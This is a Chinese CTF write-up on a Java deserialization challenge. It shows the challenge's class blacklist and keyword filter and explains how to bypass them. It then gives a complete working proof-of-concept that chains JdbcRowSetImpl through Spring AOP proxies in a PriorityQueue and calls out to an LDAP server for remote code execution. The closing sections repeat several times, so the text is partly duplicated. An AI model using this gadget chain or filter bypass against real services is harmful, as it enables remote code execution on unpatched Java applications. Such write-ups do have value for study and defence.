浅析CCSSSC软件攻防赛druid+Hsql依赖题解<\/h1>

环境分析<\/h2>
题目环境使用了以下关键依赖：<\/p>
<dependencies><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>org.springframework.boot<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>spring-boot-starter-data-jpa<\/artifactId><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>org.springframework.boot<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>spring-boot-starter-web<\/artifactId><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>org.hsqldb<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>hsqldb<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>2.4.1<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>com.alibaba<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>druid-spring-boot-starter<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>1.2.8<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span><\/dependencies><\/span>
<\/span><\/span><\/code><\/pre>关键组件：<\/p>

Spring Boot 2.7.0<\/li>
HSQLDB 2.4.1<\/li>
Druid 1.2.8<\/li>
隐含的Jackson依赖（用于反序列化）<\/li>
<\/ul>
题目分析<\/h2>
题目提供了一个反序列化入口点，并设置了以下WAF防护：<\/p>

对明文反序列化数据流进行简单过滤<\/li>
重写了ObjectInputStream类进行黑名单判断<\/li>
<\/ol>
WAF实现细节<\/h3>
MyObjectInputStream<\/code>类关键代码：<\/p>
public<\/span> class<\/span> MyObjectInputStream<\/span> extends<\/span> ObjectInputStream {<\/span>
<\/span><\/span>    private<\/span> String[]<\/span> denyClasses;<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> MyObjectInputStream<\/span>(<\/span>ByteArrayInputStream var1)<\/span> throws<\/span> IOException {<\/span>
<\/span><\/span>        super<\/span>(<\/span>var1);<\/span>
<\/span><\/span>        ArrayList<<\/span>String><\/span> classList =<\/span> new<\/span> ArrayList<>();<\/span>
<\/span><\/span>        InputStream file =<\/span> MyObjectInputStream.<\/span>class<\/span>.<\/span>getResourceAsStream<\/span>(<\/span>"\/blacklist.txt"<\/span>);<\/span>
<\/span><\/span>        BufferedReader var2 =<\/span> new<\/span> BufferedReader(<\/span>new<\/span> InputStreamReader(<\/span>file));<\/span>
<\/span><\/span>        while<\/span> (<\/span>true<\/span>)<\/span> {<\/span>
<\/span><\/span>            String var4 =<\/span> var2.<\/span>readLine<\/span>();<\/span>
<\/span><\/span>            if<\/span> (<\/span>var4 !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>                classList.<\/span>add<\/span>(<\/span>var4.<\/span>trim<\/span>());<\/span>
<\/span><\/span>            }<\/span> else<\/span> {<\/span>
<\/span><\/span>                this<\/span>.<\/span>denyClasses<\/span> =<\/span> new<\/span> String[<\/span>classList.<\/span>size<\/span>()];<\/span>
<\/span><\/span>                classList.<\/span>toArray<\/span>(<\/span>this<\/span>.<\/span>denyClasses<\/span>);<\/span>
<\/span><\/span>                return<\/span>;<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    protected<\/span> Class<?><\/span> resolveClass(<\/span>ObjectStreamClass desc)<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>        String className =<\/span> desc.<\/span>getName<\/span>();<\/span>
<\/span><\/span>        for<\/span> (<\/span>String denyClass :<\/span> this<\/span>.<\/span>denyClasses<\/span>)<\/span> {<\/span>
<\/span><\/span>            if<\/span> (<\/span>className.<\/span>startsWith<\/span>(<\/span>denyClass))<\/span> {<\/span>
<\/span><\/span>                throw<\/span> new<\/span> InvalidClassException(<\/span>"Unauthorized deserialization attempt"<\/span>,<\/span> className);<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        return<\/span> super<\/span>.<\/span>resolveClass<\/span>(<\/span>desc);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>黑名单内容(blacklist.txt)<\/h3>
javax.management.BadAttributeValueExpException
com.sun.org.apache.xpath.internal.objects.XString
java.rmi.MarshalledObject
java.rmi.activation.ActivationID
javax.swing.event.EventListenerList
java.rmi.server.RemoteObject
javax.swing.AbstractAction
javax.swing.text.DefaultFormatter
java.beans.EventHandler
java.net.Inet4Address
java.net.Inet6Address
java.net.InetAddress
java.net.InetSocketAddress
java.net.Socket
java.net.URL
java.net.URLStreamHandler
com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
java.rmi.registry.Registry
java.rmi.RemoteObjectInvocationHandler
java.rmi.server.ObjID
java.lang.System
javax.management.remote.JMXServiceUR
javax.management.remote.rmi.RMIConnector
java.rmi.server.RemoteObject
java.rmi.server.RemoteRef
javax.swing.UIDefaults$TextAndMnemonicHashMap
java.rmi.server.UnicastRemoteObject
java.util.Base64
java.util.Comparator
java.util.HashMap
java.util.logging.FileHandler
java.security.SignedObject
javax.swing.UIDefaults
<\/code><\/pre>
攻击思路<\/h2>
第一步：绕过第一层WAF<\/h3>
WAF检查内容：<\/p>
if<\/span> (<\/span>temp.<\/span>contains<\/span>(<\/span>"naming"<\/span>)<\/span> ||<\/span> temp.<\/span>contains<\/span>(<\/span>"com.sun"<\/span>)<\/span> ||<\/span> temp.<\/span>contains<\/span>(<\/span>"jdk.jfr"<\/span>))<\/span> {<\/span>
<\/span><\/span>    return<\/span> "banned"<\/span>;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>绕过方法：<\/p>

使用UTF8OverlongEncoding方法<\/li>
不使用包含这些字符串的类(com.sun, naming, jdk.jfr)<\/li>
<\/ol>
第二步：利用Spring AOP链<\/h3>
攻击链：<\/p>
PriorityQueue#readObject() 
-> PriorityQueue#heapify() 
-> PriorityQueue#siftDown()
-> PriorityQueue#siftDownUsingComparator() 
-> Proxy#任意接口JdkDynamicAopProxy.invoke()
-> ReflectiveMethodInvocation.proceed()
-> AspectJAroundAdvice#invoke
-> org.springframework.aop.aspectj.AbstractAspectJAdvice.invokeAdviceMethod()
-> method.invoke()
<\/code><\/pre>
参考资源：<\/p>

SpringAopInDeserializationDemo1<\/a><\/li>
Spring AOP反序列化利用分析<\/a><\/li>
SpringAOP利用分析<\/a><\/li>
<\/ul>
完整POC<\/h2>
package<\/span> com.example.ezjav;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> org.springframework.aop.aspectj.AbstractAspectJAdvice;<\/span>
<\/span><\/span>import<\/span> org.springframework.aop.framework.AdvisedSupport;<\/span>
<\/span><\/span>import<\/span> org.springframework.aop.support.DefaultIntroductionAdvisor;<\/span>
<\/span><\/span>import<\/span> java.io.*;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Constructor;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Field;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.InvocationHandler;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Proxy;<\/span>
<\/span><\/span>import<\/span> com.sun.rowset.JdbcRowSetImpl;<\/span>
<\/span><\/span>import<\/span> org.aopalliance.aop.Advice;<\/span>
<\/span><\/span>import<\/span> org.aopalliance.intercept.MethodInterceptor;<\/span>
<\/span><\/span>import<\/span> org.springframework.aop.aspectj.AspectJAroundAdvice;<\/span>
<\/span><\/span>import<\/span> org.springframework.aop.aspectj.AspectJExpressionPointcut;<\/span>
<\/span><\/span>import<\/span> org.springframework.aop.aspectj.SingletonAspectInstanceFactory;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.*;<\/span>
<\/span><\/span>import<\/span> java.util.*;<\/span>
<\/span><\/span>import static<\/span> sun.reflect.misc.FieldUtil.getField;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> Exp<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception{<\/span>
<\/span><\/span>        JdbcRowSetImpl jdbcRowSet =<\/span> new<\/span> JdbcRowSetImpl();<\/span>
<\/span><\/span>        jdbcRowSet.<\/span>setDataSourceName<\/span>(<\/span>"ldap:\/\/127.0.0.1:1389\/Deserialize\/Jackson\/Command\/Y2FsYw=="<\/span>);<\/span>
<\/span><\/span>        Method method=<\/span>jdbcRowSet.<\/span>getClass<\/span>().<\/span>getMethod<\/span>(<\/span>"getDatabaseMetaData"<\/span>);<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>method);<\/span>
<\/span><\/span>        
<\/span><\/span>        SingletonAspectInstanceFactory factory =<\/span> new<\/span> SingletonAspectInstanceFactory(<\/span>jdbcRowSet);<\/span>
<\/span><\/span>        AspectJAroundAdvice advice =<\/span> new<\/span> AspectJAroundAdvice(<\/span>method,<\/span>new<\/span> AspectJExpressionPointcut(),<\/span>factory);<\/span>
<\/span><\/span>        Proxy proxy1 =<\/span> (<\/span>Proxy)<\/span> getAProxy(<\/span>advice,<\/span>Advice.<\/span>class<\/span>);<\/span>
<\/span><\/span>        Proxy finalproxy=(<\/span>Proxy)<\/span> getBProxy(<\/span>proxy1,<\/span>new<\/span> Class[]{<\/span>Comparator.<\/span>class<\/span>});<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/代理链子
<\/span><\/span><\/span><\/span>        PriorityQueue priorityqueue=<\/span>new<\/span> PriorityQueue(<\/span>1<\/span>);<\/span>
<\/span><\/span>        priorityqueue.<\/span>add<\/span>(<\/span>1<\/span>);<\/span>
<\/span><\/span>        priorityqueue.<\/span>add<\/span>(<\/span>2<\/span>);<\/span>
<\/span><\/span>        setValue(<\/span>priorityqueue,<\/span>"comparator"<\/span>,<\/span>finalproxy);<\/span>
<\/span><\/span>        setValue(<\/span>priorityqueue,<\/span>"queue"<\/span>,<\/span>new<\/span> Object[]{<\/span>proxy1,<\/span>proxy1});<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/序列化反序列化
<\/span><\/span><\/span><\/span>        ByteArrayOutputStream barr =<\/span> new<\/span> ByteArrayOutputStream();<\/span>
<\/span><\/span>        ObjectOutputStream objectOutputStream =<\/span> new<\/span> ObjectOutputStream(<\/span>barr);<\/span>
<\/span><\/span>        objectOutputStream.<\/span>writeObject<\/span>(<\/span>priorityqueue);<\/span>
<\/span><\/span>        objectOutputStream.<\/span>close<\/span>();<\/span>
<\/span><\/span>        String res =<\/span> Base64.<\/span>getEncoder<\/span>().<\/span>encodeToString<\/span>(<\/span>barr.<\/span>toByteArray<\/span>());<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>res);<\/span>
<\/span><\/span>        new<\/span> ObjectInputStream(<\/span>new<\/span> ByteArrayInputStream(<\/span>Base64.<\/span>getDecoder<\/span>().<\/span>decode<\/span>(<\/span>res))).<\/span>readObject<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> void<\/span> setValue<\/span>(<\/span>Object obj,<\/span> String name,<\/span> Object value)<\/span> throws<\/span> Exception{<\/span>
<\/span><\/span>        Field field =<\/span> obj.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>name);<\/span>
<\/span><\/span>        field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        field.<\/span>set<\/span>(<\/span>obj,<\/span> value);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> Object getBProxy<\/span>(<\/span>Object obj,<\/span>Class[]<\/span> clazzs)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        AdvisedSupport advisedSupport =<\/span> new<\/span> AdvisedSupport();<\/span>
<\/span><\/span>        advisedSupport.<\/span>setTarget<\/span>(<\/span>obj);<\/span>
<\/span><\/span>        Constructor constructor =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.springframework.aop.framework.JdkDynamicAopProxy"<\/span>)<\/span>
<\/span><\/span>            .<\/span>getConstructor<\/span>(<\/span>AdvisedSupport.<\/span>class<\/span>);<\/span>
<\/span><\/span>        constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        InvocationHandler handler =<\/span> (<\/span>InvocationHandler)<\/span> constructor.<\/span>newInstance<\/span>(<\/span>advisedSupport);<\/span>
<\/span><\/span>        Object proxy =<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>ClassLoader.<\/span>getSystemClassLoader<\/span>(),<\/span> clazzs,<\/span> handler);<\/span>
<\/span><\/span>        return<\/span> proxy;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> Object getAProxy<\/span>(<\/span>Object obj,<\/span>Class<?><\/span> clazz)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        AdvisedSupport advisedSupport =<\/span> new<\/span> AdvisedSupport();<\/span>
<\/span><\/span>        advisedSupport.<\/span>setTarget<\/span>(<\/span>obj);<\/span>
<\/span><\/span>        AbstractAspectJAdvice advice =<\/span> (<\/span>AbstractAspectJAdvice)<\/span> obj;<\/span>
<\/span><\/span>        DefaultIntroductionAdvisor advisor =<\/span> new<\/span> DefaultIntroductionAdvisor(<\/span>
<\/span><\/span>            (<\/span>Advice)<\/span> getBProxy(<\/span>advice,<\/span> new<\/span> Class[]{<\/span>MethodInterceptor.<\/span>class<\/span>,<\/span> Advice.<\/span>class<\/span>}));<\/span>
<\/span><\/span>        advisedSupport.<\/span>addAdvisor<\/span>(<\/span>advisor);<\/span>
<\/span><\/span>        Constructor constructor =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.springframework.aop.framework.JdkDynamicAopProxy"<\/span>)<\/span>
<\/span><\/span>            .<\/span>getConstructor<\/span>(<\/span>AdvisedSupport.<\/span>class<\/span>);<\/span>
<\/span><\/span>        constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        InvocationHandler handler =<\/span> (<\/span>InvocationHandler)<\/span> constructor.<\/span>newInstance<\/span>(<\/span>advisedSupport);<\/span>
<\/span><\/span>        Object proxy =<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>ClassLoader.<\/span>getSystemClassLoader<\/span>(),<\/span> new<\/span> Class[]{<\/span>clazz},<\/span> handler);<\/span>
<\/span><\/span>        return<\/span> proxy;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>关键点说明<\/h2>

JNDI利用<\/strong>：使用了JdbcRowSetImpl配合LDAP服务实现RCE<\/li>
代理链构造<\/strong>：通过多层代理构造调用链<\/li>
Spring AOP利用<\/strong>：利用Spring AOP的调用链实现反序列化漏洞利用<\/li>
绕过黑名单<\/strong>：通过不使用黑名单中的类来绕过防护<\/li>
<\/ol>
注意事项<\/h2>

使用jadx保存伪代码时，需要在项目中新建Resources目录并放入blacklist.txt文件<\/li>
本地测试时可以使用JNDIMap<\/a>工具<\/li>
Spring AOP版本需要匹配题目环境，否则可能无法成功利用<\/li>
<\/ol>
总结<\/h2>
这道题目展示了如何利用Spring AOP链实现反序列化漏洞的利用，通过精心构造的代理链绕过了黑名单限制，最终实现了RCE。这种利用方式非常巧妙，需要对Spring框架的内部机制有深入理解。<\/p>
浅析CCSSSC软件攻防赛druid+Hsql依赖题解<\/h1>

攻击思路<\/h2>

关键点说明<\/h2> JNDI利用<\/strong>：使用了JdbcRowSetImpl配合LDAP服务实现RCE<\/li> 代理链构造<\/strong>：通过多层代理构造调用链<\/li> Spring AOP利用<\/strong>：利用Spring AOP的调用链实现反序列化漏洞利用<\/li>

注意事项<\/h2> 使用jadx保存伪代码时，需要在项目中新建Resources目录并放入blacklist.txt文件<\/li>

总结<\/h2> 这道题目展示了如何利用Spring AOP链实现反序列化漏洞的利用，通过精心构造的代理链绕过了黑名单限制，最终实现了RCE。这种利用方式非常巧妙，需要对Spring框架的内部机制有深入理解。<\/p>

总结<\/h2>
这道题目展示了如何利用Spring AOP链实现反序列化漏洞的利用，通过精心构造的代理链绕过了黑名单限制，最终实现了RCE。这种利用方式非常巧妙，需要对Spring框架的内部机制有深入理解。<\/p>
